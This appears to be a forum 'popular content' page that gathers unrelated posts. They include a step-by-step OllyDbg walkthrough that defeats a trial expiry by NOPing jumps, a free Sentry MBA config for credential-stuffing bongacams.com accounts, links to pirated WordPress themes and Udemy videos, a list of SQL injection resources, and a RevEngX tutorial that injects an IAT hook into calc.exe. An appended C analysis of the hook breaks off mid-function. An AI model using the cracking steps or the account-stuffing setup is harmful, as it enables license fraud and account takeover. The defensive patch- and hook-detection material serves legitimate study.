Leaderboard
Popular Content
Showing content with the highest reputation on 12/07/14 in all areas
-
Abstract

The objective of this paper is to explain how to crack an executable, without peeking at its source code, by using the OllyDbg tool. Although there are many tools that can achieve the same objective, the beauty of OllyDbg is that it is simple to operate and freely available. We have already done much reverse engineering of .NET applications earlier. This time, we are confronted with an application whose origin is unknown altogether. In simple terms, we don't have the actual source code. We have only the executable version, which makes reverse engineering a tedious task.

Essentials

The security researcher must have a rigorous knowledge of assembly programming language. The machine is expected to be configured with the following tools:

OllyDbg
Assembly programming knowledge
CFF Explorer

Patching Native Binaries

When the source code is not provided, it is still possible to patch the corresponding software binaries in order to remove various security restrictions imposed by the vendor, as well as to fix inherent bugs in the source code. A familiar type of restriction built into software is copy protection, which is normally forced by the software vendor in order to test the robustness of the software copy protection. In copy protection, the user is typically obliged to register the product before use. The vendor stipulates a time restriction on the beta software in order to avoid license misuse and to permit the product to run only in a reduced-functionality mode until the user registers.

Executable Software

The following sample shows a way of bypassing or removing the copy protection in order to use the product without extending the trial duration or, in fact, without purchasing the full version. The copy protection mechanism often involves a process in which the software checks whether it should run and, if it should, which functionality should be allowed. One type of copy protection common in trial or beta software allows a program to run only until a certain date. In order to explain reverse engineering, we have downloaded from the Internet the beta version of a piece of software that is operative for 30 days. As you can see, the following trial software application has expired and no longer works; it shows an error message when we try to execute it. We don't know in which programming language or under which platform this software was developed, so the first task is to identify its origin. We can use CFF Explorer, which displays some significant information, such as that this software was developed using VC++, as shown below. We can easily conclude that this is a native executable and that it does not execute under the CLR. We can't use ILDASM or Reflector to analyze its opcodes. This time, we have to choose a different approach to crack the native executable.

Disassembling with OllyDbg

When we attempt to load the SoftwareExpiration.exe file, it will refuse to run because the current date is past the date on which the authorized trial expired. How can we use this software despite the expiration of the trial period? The following section illustrates the steps in the context of removing the copy protection restriction.

The Road Map

Load the expired program in order to understand what is happening behind the scenes.
Debug this program with OllyDbg.
Trace the code backward to identify the code path.
Modify the binary to force all code paths to succeed and never hit the trial expiration code path again.
Test the modifications.

Such tasks can also be accomplished with a powerful tool, IDA Pro, but it is commercial and not freely available. OllyDbg is not as powerful as IDA Pro, but it is useful in some scenarios. First download OllyDbg from its official website and configure it properly on your machine. Its interface looks like this:

Now open the SoftwareExpiration.exe program in the OllyDbg IDE from the File > Open menu and it will decompile that binary file. Don't be afraid of the bizarre assembly code, because all the modifications are performed in the native assembly code. Here the red box shows the entry point instructions of the program, at 00401204. The CPU main thread window displays the software code in the form of assembly instructions that are executed in top-to-bottom fashion. That is why, as we stated earlier, assembly programming knowledge is necessary when reverse engineering a native executable.

Unfortunately, we don't have the actual source code, so how can we inspect the assembly code? Here the error message "Sorry, this trial software has expired" might help us to solve this problem, because with the help of this error message we can identify the actual code path that leads to it. While the error dialog box is still displayed, start debugging by pressing F9 or from the Debug menu. Now you can find the time limit code. Next, press F12 in order to pause the code execution so that we can find the code that causes the error message to be displayed. Okay. Now view the call stack by pressing Alt+K. Here, you can easily figure out that the trial error text is a parameter of MessageBoxA, as follows:

Select the USER32.MessageBoxA near the bottom of the call stack, right-click, and choose "Show call": This shows the starting point, in which the assembly call to MessageBoxA is selected. Notice the greater-than symbol (>) next to some of the lines of code, which indicates that another line of code jumps to that location. Directly before the call to MessageBoxA (in red in the right pane), four parameters are pushed onto the stack. Here the PUSH 10 instruction carries the > sign, meaning it is referenced by another line of code.

Select the PUSH 10 instruction located at address 004011C0; the line of code that references the selected line is displayed in the text area below the top pane in the CPU window, as follows: Select the text area code in the above figure and right-click to open the shortcut menu. It allows you to easily navigate to the code that refers to a selected line of code, as shown: We have now identified the actual line of code that is responsible for producing the error message. Now it is time to make some modifications to the binary code. The context menu in the previous figure shows that both 00401055 and 00401063 contain a JA (jump if above) to the PUSH 10 used for the message box.

First select "Go to JA 00401055" from the context menu. You should now be on the code at location 0x00401055. Your ultimate objective is to prevent the program from hitting the error code path. This can be accomplished by changing the JA instruction to NOP (no operation), which actually does nothing. Right-click the 0x00401055 instruction inside the CPU window, select "Binary" and click "Fill with NOPs", as shown below: This operation fills the whole instruction at 0x00401055 with NOPs: Go back to PUSH 10 by pressing the hyphen (-) key and repeat the previous process for the instruction at 0x00401063, as follows: Now save the modifications by right-clicking in the CPU window, clicking "Copy to Executable", and then clicking "All Modifications". Then hit the "Copy all" button in the next dialog box, as shown below: Right after hitting the "Copy all" button, a new window will appear named "SoftwareExpiration.exe". Right-click in this window and choose "Save File": Finally, save the modified or patched binary with a new name. Now load the modified program; you can see that no expiration error message is shown. We have successfully defeated the expiration trial period restriction.

Final Note

This article demonstrates one way to challenge the strength of a copy protection measure using OllyDbg and to identify ways to make your software more secure against unauthorized consumption. By attempting to defeat the copy protection of your application, we can learn a great deal about how robust the protection mechanism is. By doing this testing before the product becomes publicly available, we can modify the code to make circumvention of copy protection more difficult before its release.
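As an added example (not code from the article), here is the integrity check a vendor can run against its own shipped binary to catch exactly the edit performed above: compare the original image with a copy and flag every run of bytes where a conditional jump was overwritten with NOPs. The byte sequences are constructed for the demonstration and are not taken from SoftwareExpiration.exe; the function names are this example's own.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One contiguous run of bytes that differs between the two images. */
typedef struct {
    size_t offset;    /* first differing byte */
    size_t length;    /* number of differing bytes */
    int    nop_fill;  /* 1 if every patched byte in the run is 0x90 (NOP) */
    int    was_jcc;   /* 1 if the original run began with a conditional jump */
} Patch;

/* Short Jcc opcodes are 0x70..0x7F (JA is 0x77); near Jcc is 0x0F 0x80..0x8F. */
static int starts_with_jcc(const uint8_t *p, size_t avail)
{
    if (avail >= 1 && (p[0] & 0xF0) == 0x70)
        return 1;
    if (avail >= 2 && p[0] == 0x0F && (p[1] & 0xF0) == 0x80)
        return 1;
    return 0;
}

/* Compares two same-sized images and records each run of differing bytes.
 * Returns the number of runs found; at most max_out are written to out. */
size_t find_patches(const uint8_t *orig, const uint8_t *mod, size_t n,
                    Patch *out, size_t max_out)
{
    size_t count = 0, i = 0;
    while (i < n) {
        if (orig[i] == mod[i]) { i++; continue; }
        size_t start = i;
        int all_nop = 1;
        while (i < n && orig[i] != mod[i]) {
            if (mod[i] != 0x90) all_nop = 0;
            i++;
        }
        if (count < max_out) {
            out[count].offset   = start;
            out[count].length   = i - start;
            out[count].nop_fill = all_nop;
            out[count].was_jcc  = starts_with_jcc(orig + start, n - start);
        }
        count++;
    }
    return count;
}

/* A run that replaced a conditional jump with NOPs is the signature of the
 * "Fill with NOPs" edit described in the article. */
size_t count_nopped_jumps(const Patch *p, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (p[i].nop_fill && p[i].was_jcc) hits++;
    return hits;
}

/* Constructed sample: a fragment shaped like a trial check, with two JA
 * instructions that lead to the "expired" message box. Bytes and offsets are
 * invented for this demonstration. */
static const uint8_t ORIG_IMAGE[] = {
    0x3B, 0xC1,        /* cmp  eax,ecx        today vs. expiry date */
    0x77, 0x0C,        /* ja   +0x0C          -> expired message box */
    0x8B, 0x45, 0x08,  /* mov  eax,[ebp+8] */
    0x3B, 0xC2,        /* cmp  eax,edx */
    0x77, 0x05,        /* ja   +0x05          -> second path to the same box */
    0x33, 0xC0,        /* xor  eax,eax */
    0xC3,              /* ret */
    0x6A, 0x10,        /* push 10             MessageBoxA uType (the > target) */
};
static const uint8_t PATCHED_IMAGE[] = {
    0x3B, 0xC1,
    0x90, 0x90,        /* first JA filled with NOPs */
    0x8B, 0x45, 0x08,
    0x3B, 0xC2,
    0x90, 0x90,        /* second JA filled with NOPs */
    0x33, 0xC0,
    0xC3,
    0x6A, 0x10,
};

/* Runs the comparison over the sample, prints each run, and returns the
 * number of NOP-filled conditional jumps (2 for the sample above). */
size_t scan_sample(void)
{
    Patch runs[8];
    size_t n = find_patches(ORIG_IMAGE, PATCHED_IMAGE, sizeof ORIG_IMAGE, runs, 8);
    size_t stored = n < 8 ? n : 8;
    for (size_t i = 0; i < stored; i++)
        printf("offset 0x%zx: %zu byte(s) changed%s%s\n",
               runs[i].offset, runs[i].length,
               runs[i].nop_fill ? ", NOP fill" : "",
               runs[i].was_jcc ? ", replaced a conditional jump" : "");
    return count_nopped_jumps(runs, stored);
}

int main(void)
{
    printf("suspicious patches: %zu\n", scan_sample());
    return 0;
}
```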
-
Here is the config for the videochat site bongacams.com. Load this config, add a good combo and a proxy list, and then, so that you have success with the accounts and they have as many tokens on them as possible, analyze the page in Sentry MBA and refresh the tokens too.. good luck!

I sold it for 50 euros, but today I'm giving it to you for free.
-
If you want to download all of them, please visit my home page http://preshare4u.com

1. BetterMag v1.6 – News, Blog, Magazine WordPress Theme
Theme Features: Most useful and powerful WordPress magazine, news, blog and shop theme. Clean and modern design with multiple styles and skins in one theme. Fully responsive design: all elements are responsive. 11 styles: two advanced styles with 11 skins included by default.
http://preshare4u.com/bettermag-v1-6-news-blog-magazine-wordpress-theme/

2. Pai v1.1 – Simple and Clean Business Corporate Template
Pai is a simple and clean business/corporate template built with the latest WordPress features: custom post types, unlimited colors, background uploader, etc.
http://preshare4u.com/pai-v1-1-simple-and-clean-business-corporate-template/

3. Richer v2.1.8 – Responsive Multi-Purpose Theme
Update: Version 2.1.8 is now released! Great innovations have been implemented; they perfectly amplify the existing features. You can check the changelog at the bottom of this page for more details and examples.
http://preshare4u.com/richer-v2-1-8-responsive-multi-purpose-theme/
-
BitDefender Total Security 2015 offers complete protection with an award-winning antivirus engine, a high-performance firewall, parental control, anti-phishing, anti-spam, web and behavioural protection, and it improves your PC's performance. Now you can have it free for 6 months through a special promotion. Go to the link below and fill in your email address and the captcha code: Free Bitdefender 2015. The initial licence is for 6 months and will automatically renew in February 2015 for another 6 months. -> Source: BitDefender Total Security 2015 – one year FREE licence (new promotion)
-
Hi. I'm offering free tutorials from udemy . com, but only video content; if it is a slideshow or anything else, I can't provide it. Leave a link to any tutorial you want. PS: You need to have at least 150 posts (so I don't waste my time for nothing). PS2: I can't provide the folder structure that is on their site; the files will have the names they were uploaded with, so pray that whoever uploaded them put numbers in front.
-
Here's our large collection of SQL Injection related resources. This list has something for everyone, from those just starting out to the most senior ethical hackers.

What is an SQL Injection? An Introduction
SQL Injection Demo
Cookie Based SQL Injection
SQL Injection through HTTP Headers
SQL Injection with SQLmap
Blind SQL Injection: Attack Anatomy
Dumping a Database using SQL Injection
Testing for SQL Injection with sqlmap
Fuzzing for SQL Injection w/ Burp Suite Intruder
SQL Truncation Attack
Parameterized SQL Query over Dynamic SQL Query
Gaining Reverse Shell from SQL Injection
SQL Injection through SQLMap Burp Plugin
Creating Backdoors Using SQL Injection
SQLi Labs Tutorial
SQLNuke: MySQL Injection load_file() Fuzzer
Double Query Injections Demystified
Advanced SQLMap Tutorial
-
RevEngX

RevEngX is a freely available extension for the Debugging Tools for Windows. It offers several new commands to simplify the work of reverse engineering, code injection, hooking and other types of instrumentation that are useful when analyzing third-party software or malware, or when developing commercial Windows applications that use code injection and hooking. This article will demonstrate how one might produce and test a hook on the fly using the debugger alone. In practice, it would be easier to code up hook functions in C++ in a DLL, inject the DLL using !loadlibrary (a RevEngX command), and then set hooks pointing to the injected code using any of a number of methods. The technique presented in this article is designed more to demonstrate the power of the tools being presented, and to introduce the reader to a new world of possibilities.

Prerequisites

It is expected that the reader is familiar with the basics of the Debugging Tools for Windows package. Windbg.exe will be used in the example, but ntsd.exe and cdb.exe may also be used if preferred. The reader should also be familiar with x86 assembly language and have some understanding of the techniques used to hook APIs on Windows. Obviously a basic understanding of Windows APIs is also necessary. RevEngX is needed as well. It can be downloaded from RevEngX.com - Reverse Engineering Extensions - Andrew L. Sandoval. Obtain the most recent version and install RevEngX.dll in the winext directory for the matching bitness of the debugger. Newer versions of the Debugging Tools for Windows package install both the 32-bit and 64-bit versions of the tools. It is important to match the RevEngX extension to the bitness of the debugger, and to use the 32-bit version of windbg.exe for debugging 32-bit applications with RevEngX, and the 64-bit version for 64-bit applications. Many of the RevEngX commands are independent of bitness, but some are not, and it is always best to match your debugger to the bitness of the application being debugged, unless you are debugging or reversing WOW64 thunks, etc. Note that while the example uses x86 assembly language, it could easily be done with x64 (amd64) assembly as well, given a bit of work rewriting the hook function mnemonics.

A Visual Example

This example will use a simple Import Address Table (IAT) hook. Such a hook employs no stealth: it is easily detectable using RevEngX or other tools that can locate hooks (such as GMER). A very stealthy hook can also be implemented using RevEngX and the debugger, but this is beyond the scope of this article. In order to make the demonstration very visual as well as simple, we will hook the GDI function responsible for displaying text. Our hook function will reverse the strings being sent to ExtTextOutW before invoking the original function. You can choose any target you would like, but in the example below I will use the 32-bit version of Calculator (calc.exe). The visual result will be hard to miss.

Step 1: Launch Calculator (or your preferred target)

Step one is simple: launch calc.exe. If you are running on a 64-bit version of Windows, be sure to run the 32-bit version. To do this just run C:\Windows\SysWOW64\calc.exe. It should look ... well, very normal:

Step 2: Attach the Debugger

The second step is to start the debugger and attach it to the target application. There are numerous ways to do this, and it depends upon where your Debugging Tools for Windows are installed. For this example I'm going to assume you know how to start the debugger. Just use F6 and select calc.exe to attach the debugger. (Yes, I know it sounds like a baby step, and it is, but that's just in case someone blew off that particular prerequisite.)
You should now be able to enter commands into the debugger, with it stopped in the debugger-injected thread:

Step 3: Load RevEngX

Okay, this is a baby step too if you are familiar with debugger extensions, but just in case... Just run:

.load RevEngX

as shown below. To get a list of the currently supported commands available in RevEngX, enter !help: The list of commands is too long to display in a single screenshot, but you get the idea. There is a lot here and only a few commands will be used in this article. Many of the ones shown are helpers used in breakpoints for analyzing a target process or system (yes, some of them were even meant to be used from a kernel debugger).

Step 4: Set Up Memory for our Hook Function

To set up the memory for our hook function we could simply use .dvalloc (see the debugger's help for details). In this example, however, I'm going to use RevEngX's !callfn command to do the same thing. The difference is that .dvalloc will allocate memory from the debugger using VirtualAllocEx, supplying the handle to the target process. !callfn, on the other hand, will invoke VirtualAlloc in the target process. Either one will work, but when I originally wrote the commands it was for a lecture in which the target processes were already hooked and the students needed to discover how it was done. To simplify setting this up on 30 machines, the debugging commands were all designed to be copy-pasted into the debugger. !callfn conveniently tracks the return value from the call to VirtualAlloc for us, where we would otherwise have to copy-paste it, or re-type it from the output of .dvalloc. Enter the first command as follows:

!callfn @$t0 = kernel32!VirtualAlloc(NULL, 1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE)

This will cause RevEngX to build and inject the code needed to call VirtualAlloc in the target process with the parameters shown. It will also invoke the call and store the return value in the pseudo-register $t0. The debugger output should reassure you of this:

Step 5: Set Up Synthetic Variables

Strictly speaking, you can get by without any synthetic variables, but you will see that when we assemble our hook function, having them is much easier! In fact, I'm surprised that I had to add this to my extension. It is such a powerful thing that it should be built into the debugger. To declare our variables, run the following commands (you can copy-paste them all at once):

!synmod HOOKTEST @$t0
!synsym g_pfnExtTextOutWp2 @$t0
!synsym g_pfnwcsrev g_pfnExtTextOutWp2+4
!synsym g_pfnwcslen g_pfnExtTextOutWp2+8
!synsym g_pfnwcsncpy g_pfnExtTextOutWp2+c
!synsym HookExtTextOutW g_pfnExtTextOutWp2+20

By way of explanation, !synmod sets up a synthetic module. That means that the block of memory we allocated, which is pointed to by $t0, will look like a DLL called HOOKTEST to the debugger. Each !synsym command names a synthetic variable or "symbol" and associates an address with it. The variables created are as follows:

g_pfnExtTextOutWp2: This symbol holds the address of the real ExtTextOutW function. It will be invoked by our hook after reversing the input string.
g_pfnwcsrev: This is a pointer to the _wcsrev function in the CRT, which our hook will utilize.
g_pfnwcslen: This is a pointer to the wcslen function in the CRT.
g_pfnwcsncpy: This is a pointer to the wcsncpy function in the CRT.
HookExtTextOutW: This is the address of our hook function, called HookExtTextOutW.

Step 6: Fill in our "variables"

The first four synthetic symbols set up in step 5 are all pointers to function pointers. We need them to hold the actual addresses of the target functions to which they point. Copy-paste or enter the following commands to fill them in:

ed g_pfnExtTextOutWp2 GDI32!ExtTextOutW+2
ed g_pfnwcsrev msvcrt!_wcsrev
ed g_pfnwcslen msvcrt!wcslen
ed g_pfnwcsncpy msvcrt!wcsncpy
dds g_pfnExtTextOutWp2 g_pfnwcsncpy

This should be fairly self-explanatory. If not, look at the debugger's help for the ed command.
The last command will display the result of what we just did. The output should look like that shown in the screenshot below, where the highlight is found:

Step 7: Build the Hook Function

The hook function is fairly simple. If it were more complex we would want to write it in C or C++ (there are very good reasons to use C++ that you might not realize, such as those outlined in this article: Exceptions In Injected Code - InfoSec Institute). In this example, however, we are only going to reverse the input string, and only if it isn't too long for us to reasonably do so in simple assembly code. For now, just copy-paste the assembly commands below. Be sure to hit enter one final time to get out of "Input>" mode.

a HookExtTextOutW
push ebp
mov ebp, esp
sub esp, 1000
push ebx
mov ebx, dword ptr [ebp+1C]
push esi
push edi
mov edi, dword ptr [ebp+20]
test ebx, ebx
je HookExtTextOutW+0x6c
test edi, edi
je HookExtTextOutW+0x6c
mov esi, edi
cmp edi, FFFFFFFF
jne HookExtTextOutW+0x2e
push ebx
call dword ptr [g_pfnwcslen]
pop ecx
mov esi, eax
cmp esi, 800
ja HookExtTextOutW+0x6c
push esi
lea eax, [ebp-1000]
push ebx
push eax
call dword ptr [g_pfnwcsncpy]
xor eax, eax
mov word ptr [ebp+esi*2-1000], ax
lea eax, [ebp-1000]
push eax
call dword ptr [g_pfnwcsrev]
add esp, 10
push dword ptr [ebp+24]
lea eax, [ebp-1000]
push edi
push eax
jmp HookExtTextOutW+0x71
push dword ptr [ebp+24]
push edi
push ebx
push dword ptr [ebp+18]
push dword ptr [ebp+14]
push dword ptr [ebp+10]
push dword ptr [ebp+C]
push dword ptr [ebp+8]
call dword ptr [g_pfnExtTextOutWp2]
pop edi
pop esi
pop ebx
leave
ret 20

When you are done, you should be back to a prompt that looks like this: Now I will briefly explain the assembly. I'm not going to go into detail; you should see what I'm pointing out right away if you are comfortable with x86 assembly language. Feel free to skip to the next step if you already get it.

0:004> uf HookExtTextOutW
HOOKTEST!HookExtTextOutW:
02400020 55              push    ebp
02400021 8bec            mov     ebp,esp
02400023 81ec00100000    sub     esp,1000h
02400029 53              push    ebx
0240002a 8b5d1c          mov     ebx,dword ptr [ebp+1Ch]
0240002d 56              push    esi
0240002e 57              push    edi
0240002f 8b7d20          mov     edi,dword ptr [ebp+20h]
02400032 85db            test    ebx,ebx
02400034 7456            je      HOOKTEST!HookExtTextOutW+0x6c (0240008c)

This first section starts with a normal prologue. The stack is set up to reserve 0x1000 bytes of space. That is so that we have a good-sized buffer in which to hold our reversed copy of the input string. You will recall that the prototype for ExtTextOutW is as follows:

BOOL ExtTextOut(
  _In_ HDC hdc,
  _In_ int X,
  _In_ int Y,
  _In_ UINT fuOptions,
  _In_ const RECT *lprc,
  _In_ LPCTSTR lpString,
  _In_ UINT cbCount,
  _In_ const INT *lpDx
);

After our prologue code runs, ebp is used to access the input parameters. This means that [ebp+1Ch] points to the input string. This pointer is copied into ebx. After preserving registers on the stack, edi will hold the cbCount (length) of the string from [ebp+20h]. Finally, the test and je check for a nullptr input string. When the input string is NULL we simply call the original function with the original parameters and return its return value. The three instructions at HOOKTEST!HookExtTextOutW+0x6c are used just for this purpose. The next block of disassembly shows us doing exactly the same thing if the string length is 0:

HOOKTEST!HookExtTextOutW+0x16:
02400036 85ff            test    edi,edi
02400038 7452            je      HOOKTEST!HookExtTextOutW+0x6c (0240008c)

At this point we should have a valid input string and either a length or -1 indicating that the string is null terminated.
The next block of code looks for the -1, and if found it calls wcslen to get the length of the string:

HOOKTEST!HookExtTextOutW+0x1a:
0240003a 8bf7            mov     esi,edi
0240003c 81ffffffffff    cmp     edi,0FFFFFFFFh
02400042 750a            jne     HOOKTEST!HookExtTextOutW+0x2e (0240004e)
HOOKTEST!HookExtTextOutW+0x24:
02400044 53              push    ebx
02400045 ff1508004002    call    dword ptr [HOOKTEST!g_pfnwcslen (02400008)]
0240004b 59              pop     ecx
0240004c 8bf0            mov     esi,eax

In either case, the length of the string is stored in esi. If the value is not -1 to start with, that happens at 0240003a; otherwise esi is updated at 0240004c with the wcslen result. Next, one more test is made to see if the string is longer than 0x800 bytes. 0x800 times 2 for wide characters is 0x1000. That is all we can handle. If the string is longer, the original function is invoked without reversing the string:

HOOKTEST!HookExtTextOutW+0x2e:
0240004e 81fe00080000    cmp     esi,800h
02400054 7736            ja      HOOKTEST!HookExtTextOutW+0x6c (0240008c)

The next block of code copies the original string to our stack buffer, and then reverses it by calling _wcsrev:

HOOKTEST!HookExtTextOutW+0x36:
02400056 56              push    esi
02400057 8d8500f0ffff    lea     eax,[ebp-1000h]
0240005d 53              push    ebx
0240005e 50              push    eax
0240005f ff150c004002    call    dword ptr [HOOKTEST!g_pfnwcsncpy (0240000c)]
02400065 31c0            xor     eax,eax
02400067 6689847500f0ffff mov     word ptr [ebp+esi*2-1000h],ax
0240006f 8d8500f0ffff    lea     eax,[ebp-1000h]
02400075 50              push    eax
02400076 ff1504004002    call    dword ptr [HOOKTEST!g_pfnwcsrev (02400004)]
0240007c 83c410          add     esp,10h
0240007f ff7524          push    dword ptr [ebp+24h]
02400082 8d8500f0ffff    lea     eax,[ebp-1000h]
02400088 57              push    edi
02400089 50              push    eax
0240008a eb05            jmp     HOOKTEST!HookExtTextOutW+0x71 (02400091)

You will notice that there is also some code in there to ensure NULL termination prior to calling _wcsrev. This is needed because, while ExtTextOutW doesn't require a null-terminated string, _wcsrev does. Also, of all of the functions invoked, only _wcsrev is cdecl, requiring its parameters to be cleaned from the stack at 0240007c. Starting at 02400088, the pointer to our reversed string and its length (length first) are pushed to the stack to set up the last two arguments of the call to the real ExtTextOutW function. The jmp at 0240008a is used to jump over our code that pushes the original string and original length values when they do not meet our criteria in the tests prior to the copy and reverse:

HOOKTEST!HookExtTextOutW+0x6c:
0240008c ff7524          push    dword ptr [ebp+24h]
0240008f 57              push    edi
02400090 53              push    ebx

The final block of code pushes the remaining original arguments onto the stack and invokes the original ExtTextOutW function:

HOOKTEST!HookExtTextOutW+0x71:
02400091 ff7518          push    dword ptr [ebp+18h]
02400094 ff7514          push    dword ptr [ebp+14h]
02400097 ff7510          push    dword ptr [ebp+10h]
0240009a ff750c          push    dword ptr [ebp+0Ch]
0240009d ff7508          push    dword ptr [ebp+8]
024000a0 ff1500004002    call    dword ptr [HOOKTEST!g_pfnExtTextOutWp2 (02400000)]
024000a6 5f              pop     edi
024000a7 5e              pop     esi
024000a8 5b              pop     ebx
024000a9 c9              leave
024000aa c22000          ret     20h

Starting at 024000a6 the epilogue code cleans up our stack and returns the result of ExtTextOutW to the caller. That is it. It is fairly simple. (Did you see a bug?) And it is short enough to be easily tested in the debugger.

Step 8: Setting the Hook

RevEngX offers the !iatentry command to allow viewing IAT (Import Address Table) entries. The same command may also be used to set up an IAT hook. Before we set a hook, run the !iatentry command to see where ExtTextOutW is invoked via the import table in this process. Enter !iatentry ExtTextOutW.
The output should look something like this: 0:004> !iatentry ExtTextOutW Symbol Address: GDI32!ExtTextOutW (76df8b7a) Module Name: GDI32 Image Name: C:/Windows/syswow64/GDI32.dll Loaded Image Name: C:/Windows/syswow64/GDI32.dll IAT_ADDR ACTUAL SYMBOL IMPORTER 724d0544 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsSysWOW64UxTheme.dll 7113115c GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2COMCTL32.dll 6ed51168 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36gdiplus.dll 767d0254 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssystem32IMM32.DLL 75341078 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64LPK.dll 764e14a8 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64MSCTF.dll 75372158 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64SHELL32.dll 76b4123c GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64SHLWAPI.dll 75230258 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64USER32.dll 75181004 GDI32!ExtTextOutW (76df8b7a) GDI32!ExtTextOutW C:Windowssyswow64USP10.dll From this you can see that several DLLS call gdi32!ExtTextOutW through their import tables. Calc.exe itself does not, but other DLL’s it uses for displaying strings are listed. We can now set an IAT hook on all of those imports using: !iatentry ExtTextOutW -set HookExtTextOutW. The output should look similar to what is in the screenshot below: Step 9: Detach the Debugger and let the application run… We are now ready to let this rip. You could simply enter ‘g’ at the prompt and let it run in the debugger. I recommend that for the first time. Once you are confident you have it right you can simply enter .detach to detach the debugger from the process and let it run. From there you can ‘q’uit or exit the debugger. 
Your running copy of Calculator should now have visual evidence of your hook as shown below: You will notice that things don’t just reverse automatically. They have to be redrawn. Running the mouse over the buttons is all it takes in calc to get them to redraw. Menus are drawn when pulled down and so they are reversed. The spacing is off. That is because of the kerning ExtTextOutW does behind the scenes. We really mess it up when we reverse the string – at least in some cases. Where to go next… Besides giving you a new practical joke to pull on a co-worker, this article demonstrates a few of the most powerful commands available to you through the debugger while using RevEngX. Probably the most powerful command, and the one I am most proud of, is the !callfn command. It will let you invoke any function in the target process, and it has access to a database of thousands of definitions that match those in the Windows SDK header files, to allow for a more natural looking call. You can use other commands such as !define to add new definitions to the database if you find that one you use often is missing. You can change definitions that might be wrong for your version of Windows. Database entries are persistent, and the database can be copied to new machines as needed. (Search for RevEngX.db in your home directory.) In addition to calling functions, there are many other commands available in RevEngX that will make your life as an Engineer, Reverse Engineer, or researcher easier! And there is more to come in future versions of RevEngX! One that I’ve started, but not had time to finish is a hex editor window that will allow you to define structure definitions based on regions of memory in the target process. The Hex Editor is done, I just need to finish up the new !dt command and some of the UI work for displaying structural elements with their respective data. This should be a powerful addition to the debugger for reverse engineers. 
Whatever the cause, just have fun and be responsible! Remember that no matter how clever you think you are, someone can always figure out what you did! As an example, when I reattach the debugger to our hooked calc.exe, and run RevEngX’s !iathooks command (see also !eathooks), I can quickly spot our hooks: 0:004> !iathooks IAT_ADDR EXPECTED ACTUAL SYMBOL IMPORTER 724d0544 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsSysWOW64UxTheme.dll 7113115c 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2COMCTL32.dll 6ed51168 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:WindowsWinSxSx86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.18120_none_72d2e82386681b36gdiplus.dll 767d0254 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssystem32IMM32.DLL 75341078 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64LPK.dll 764e14a8 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64MSCTF.dll 75372158 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64SHELL32.dll 76b4123c 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64SHLWAPI.dll 75230258 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64USER32.dll 75181004 76df8b7a 02400020 GDI32.dll!ExtTextOutW C:Windowssyswow64USP10.dll (Note that quick isn’t really accurate. Without any extra parameters !iathooks has to search *every* IAT entry to see if it has been hooked. Most processes have a lot of DLLs with a lot of entries, so be patient!) My hope is that this tool is an aid to the honest and the good, and that it simply will not appeal to those with ill intent! Source1 point
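As an added example, not part of the RevEngX post, the handler's length logic from the listing above is rewritten in portable C so the boundary case behind the author's "Did you see a bug?" can be checked outside the debugger: with esi equal to 0x800 the `ja` at 02400054 falls through, wcsncpy fills the whole 0x1000-byte buffer, and the terminating store at 02400067 lands at [ebp+0], on the saved frame pointer. The `wcsrev_inplace` helper stands in for the CRT's _wcsrev, and BUF_BYTES and MAX_LEN are the constants read off the listing.

```c
#include <stdio.h>
#include <stddef.h>
#include <wchar.h>

/* Constants taken from the listing: the handler reserves a 0x1000-byte stack
 * buffer (lea eax,[ebp-1000h]) and compares the length against 800h. */
#define BUF_BYTES 0x1000u
#define BUF_CHARS (BUF_BYTES / 2u)      /* 0x800 UTF-16 code units */
#define MAX_LEN   0x800u                /* the immediate in "cmp esi,800h" */

/* "cmp esi,800h / ja": the copy-and-reverse path is taken when len <= 0x800. */
int accepts_as_written(size_t len) { return len <= MAX_LEN; }

/* What the buffer actually allows: len characters plus one terminator. */
int accepts_fixed(size_t len) { return len + 1 <= BUF_CHARS; }

/* Byte offset from ebp of the "mov word ptr [ebp+esi*2-1000h],ax" store.
 * Negative lands inside the buffer; 0 hits the saved ebp itself. */
long terminator_offset_from_ebp(size_t len) { return (long)(len * 2) - (long)BUF_BYTES; }

/* Portable stand-in for the CRT _wcsrev the handler reaches via g_pfnwcsrev. */
static void wcsrev_inplace(wchar_t *s) {
    size_t n = wcslen(s);
    for (size_t i = 0; i + 1 < n; i++, n--) {
        wchar_t t = s[i]; s[i] = s[n - 1]; s[n - 1] = t;
    }
}

/* Emulates the handler's decisions with the corrected check. cch == -1 means
 * "call wcslen", as in the cmp edi,0FFFFFFFFh branch. Returns a pointer to a
 * static buffer holding the reversed string, or NULL when the handler would
 * hand the original string through unchanged. */
const wchar_t *reverse_for_exttextout(const wchar_t *str, int cch) {
    static wchar_t buf[BUF_CHARS];
    size_t len = (cch == -1) ? wcslen(str) : (size_t)cch;
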